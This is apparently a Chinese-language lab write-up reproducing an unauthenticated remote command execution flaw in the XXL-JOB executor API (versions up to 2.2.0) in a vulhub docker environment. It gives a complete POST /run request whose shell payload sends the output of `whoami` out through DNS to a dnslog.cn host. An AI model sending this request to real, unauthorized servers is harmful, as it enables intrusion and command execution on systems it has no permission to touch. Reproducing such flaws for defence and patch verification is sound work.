XXL-JOB概述
XXL-JOB 是一个开源的分布式任务调度平台,支持定时任务和分布式任务。该平台提供了一套可视化的任务管理界面,方便用户配置和监控任务的执行情况。
漏洞概述
漏洞影响版本:<=2.2.0
executor默认没有配置认证,未授权的攻击者可以通过RESTful API接口执行任意命令。
此漏洞为XXL-JOB配置不当情况下反序列化RCE。
执行器配置文件中说到端口号在默认情况下是9999
复现
本地搭建靶场,使用靶场为vulhub,使用docker运行环境
启动环境后,http://ip:8080为管理端,http://ip:9999为客户端
访问http://ip:9999/,出现以下情况可能存在漏洞
访问http://ip:9999/run,并使用bp抓包,将数据包的发送方式改为POST
数据包内容
POST /run HTTP/1.1
Host: {ip}:9999
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/json
Content-Length: 382
{
"jobId": 4,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "ping -n 1 `whoami`.7fx080.dnslog.cn",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
注意:每次发送请求,需要更改报文中的jobId值,否则命令可能无法执行
成功得到回显
创建文件
注意:此环境由docker搭建,创建的文件生成于对应的容器中
复现完成